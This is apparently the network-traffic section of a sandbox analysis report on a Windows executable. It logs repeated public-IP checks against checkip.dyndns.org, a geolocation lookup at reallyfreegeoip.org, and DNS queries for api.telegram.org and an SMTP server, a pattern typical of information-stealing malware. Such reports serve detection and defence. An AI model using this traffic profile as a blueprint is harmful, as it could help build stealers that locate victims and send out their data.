                                                                                                                                            Nov 7, 2024 15:19:36.548437119 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:36.548551083 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:36.553987980 CET8049711193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:39.220664024 CET8049711193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:39.233215094 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:39.238118887 CET8049712193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:39.238220930 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:39.238316059 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:39.243227005 CET8049712193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:39.274831057 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.213118076 CET8049712193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.213666916 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.214350939 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.214402914 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.214472055 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.214807034 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.214821100 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.218935013 CET8049711193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.219028950 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.259181023 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.815099001 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.816976070 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.817003965 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.956859112 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.956953049 CET44349713188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.957012892 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.957752943 CET49713443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:41.961616039 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.962831974 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.967048883 CET8049712193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.967144966 CET4971280192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.967674017 CET8049715193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:41.967741013 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.967837095 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:41.972909927 CET8049715193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:42.795804977 CET8049715193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:42.797002077 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:42.797058105 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:42.797127962 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:42.797383070 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:42.797401905 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:42.837337017 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.403500080 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.446671963 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:43.476362944 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:43.476376057 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.626302958 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.626410961 CET44349717188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.626476049 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:43.626966000 CET49717443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:43.629961014 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.631010056 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.635389090 CET8049715193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.635493994 CET4971580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.635862112 CET8049719193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:43.635952950 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.636042118 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:43.640778065 CET8049719193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:45.321227074 CET8049719193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:45.323231936 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:45.323290110 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:45.323367119 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:45.323632002 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:45.323651075 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:45.368546963 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:45.937875986 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:45.959532976 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:45.959574938 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:46.123471022 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:46.123558044 CET44349722188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:46.123632908 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:46.124099970 CET49722443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:46.127082109 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:46.128177881 CET4972380192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:46.132565022 CET8049719193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:46.132633924 CET4971980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:46.133157969 CET8049723193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:46.133214951 CET4972380192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:46.133323908 CET4972380192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:46.138108969 CET8049723193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:47.962872028 CET8049723193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:47.964226961 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:47.964274883 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:47.964333057 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:47.964590073 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:47.964608908 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.009162903 CET4972380192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:48.578725100 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.585269928 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:48.585289001 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.744657040 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.744771004 CET44349724188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:48.744860888 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:48.745488882 CET49724443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:48.748339891 CET4972380192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:48.749537945 CET4972580192.168.2.8193.122.130.0
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 7, 2024 15:19:27.663923025 CET | 51168 | 53 | 192.168.2.8 | 1.1.1.1
Nov 7, 2024 15:19:27.670643091 CET | 53 | 51168 | 1.1.1.1 | 192.168.2.8
Nov 7, 2024 15:19:30.542818069 CET | 58300 | 53 | 192.168.2.8 | 1.1.1.1
Nov 7, 2024 15:19:30.549988031 CET | 53 | 58300 | 1.1.1.1 | 192.168.2.8
Nov 7, 2024 15:19:51.143961906 CET | 53481 | 53 | 192.168.2.8 | 1.1.1.1
Nov 7, 2024 15:19:51.150883913 CET | 53 | 53481 | 1.1.1.1 | 192.168.2.8
Nov 7, 2024 15:19:57.775363922 CET | 58586 | 53 | 192.168.2.8 | 1.1.1.1
Nov 7, 2024 15:19:57.783660889 CET | 53 | 58586 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 7, 2024 15:19:27.663923025 CET | 192.168.2.8 | 1.1.1.1 | 0x1f3f | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:30.542818069 CET | 192.168.2.8 | 1.1.1.1 | 0x2614 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:51.143961906 CET | 192.168.2.8 | 1.1.1.1 | 0x324d | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:57.775363922 CET | 192.168.2.8 | 1.1.1.1 | 0x4b82 | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 7, 2024 15:19:27.670643091 CET | 1.1.1.1 | 192.168.2.8 | 0x1f3f | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 15:19:27.670643091 CET | 1.1.1.1 | 192.168.2.8 | 0x1f3f | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:27.670643091 CET | 1.1.1.1 | 192.168.2.8 | 0x1f3f | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:27.670643091 CET | 1.1.1.1 | 192.168.2.8 | 0x1f3f | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:27.670643091 CET | 1.1.1.1 | 192.168.2.8 | 0x1f3f | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:27.670643091 CET | 1.1.1.1 | 192.168.2.8 | 0x1f3f | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:30.549988031 CET | 1.1.1.1 | 192.168.2.8 | 0x2614 | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:30.549988031 CET | 1.1.1.1 | 192.168.2.8 | 0x2614 | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:51.150883913 CET | 1.1.1.1 | 192.168.2.8 | 0x324d | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:57.783660889 CET | 1.1.1.1 | 192.168.2.8 | 0x4b82 | No error (0) | us2.smtp.mailhostbox.com | - | 208.91.198.143 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:57.783660889 CET | 1.1.1.1 | 192.168.2.8 | 0x4b82 | No error (0) | us2.smtp.mailhostbox.com | - | 208.91.199.224 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:57.783660889 CET | 1.1.1.1 | 192.168.2.8 | 0x4b82 | No error (0) | us2.smtp.mailhostbox.com | - | 208.91.199.223 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:19:57.783660889 CET | 1.1.1.1 | 192.168.2.8 | 0x4b82 | No error (0) | us2.smtp.mailhostbox.com | - | 208.91.199.225 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 193.122.130.0 | 80 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:19:27.681952953 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Nov 7, 2024 15:19:28.980173111 CET | 323 | IN | HTTP/1.1 200 OK
  Date: Thu, 07 Nov 2024 14:19:28 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 14951bb2aae8a768ad87a398e6c67e3c
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
Nov 7, 2024 15:19:28.997977018 CET | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Nov 7, 2024 15:19:30.501673937 CET | 323 | IN | HTTP/1.1 200 OK
  Date: Thu, 07 Nov 2024 14:19:30 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: e28b64e7f1671d7c3b8d0bb63a0bc2f3
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
Nov 7, 2024 15:19:31.482440948 CET | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Nov 7, 2024 15:19:32.888868093 CET | 323 | IN | HTTP/1.1 200 OK
  Date: Thu, 07 Nov 2024 14:19:32 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 6f79d232cabdaf2bce5692ba4b109279
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 193.122.130.0 | 80 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:19:33.671489000 CET | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Nov 7, 2024 15:19:35.745354891 CET | 323 | IN | HTTP/1.1 200 OK
  Date: Thu, 07 Nov 2024 14:19:35 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 80c4bd6076bf82dba0ed6a412450db19
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49711 | 193.122.130.0 | 80 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:19:36.548551083 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Nov 7, 2024 15:19:39.220664024 CET | 730 | IN | HTTP/1.1 502 Bad Gateway
  Date: Thu, 07 Nov 2024 14:19:39 GMT
  Content-Type: text/html
  Content-Length: 547
  Connection: keep-alive
  X-Request-ID: d6b1780790b4a5a283a636adadb84fa6
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49712 | 193.122.130.0 | 80 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:19:39.238316059 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 7, 2024 15:19:41.213118076 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:41 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7af5f2f7e6136f20b640218ba6f3ae87
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49715 | 193.122.130.0 | 80 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:19:41.967837095 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 7, 2024 15:19:42.795804977 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:42 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4dd1ca9ba849523d38cb906858ab54db
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49719 | 193.122.130.0 | 80 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:19:43.636042118 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 7, 2024 15:19:45.321227074 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:45 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2d4a96b68db3526437150fd05b6db4ba
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49723 | 193.122.130.0 | 80 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:19:46.133323908 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 7, 2024 15:19:47.962872028 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:47 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2f6590ec164b857975621b11ec7baa05
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49725 | 193.122.130.0 | 80 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:19:48.754596949 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 7, 2024 15:19:50.383461952 CET | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:50 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a51618bda2d5cf52ab5b470efeaf39e0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 188.114.96.3 | 443 | 3648 | C:\Users\user\Desktop\Lpjrd6Wxad.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 14:19:31 UTC | 87 | OUT | GET /xml/173.254.250.79 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-07 14:19:31 UTC | 1215 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 14:19:31 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
x-cache: Miss from cloudfront
via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
x-amz-cf-pop: DFW57-P5
x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 32349
Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n8mkmzcchwljDddkew6Pt9jWjbGYzgCEfq%2F2iZ0I4eenMSDpmw%2BCX05FZeW7klTBJsxZtYC1aLzV7W2qAbt6OoM3rk0zWXxjcEHW2rUFfJHovMeCmbVYcJkEOTyozVoI0yFP9qL5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dedf570c9c84677-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1193&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2329847&cwnd=247&unsent_bytes=0&cid=4bf442abf018daeb&ts=279&x=0"
2024-11-07 14:19:31 UTC | 154 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78
Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
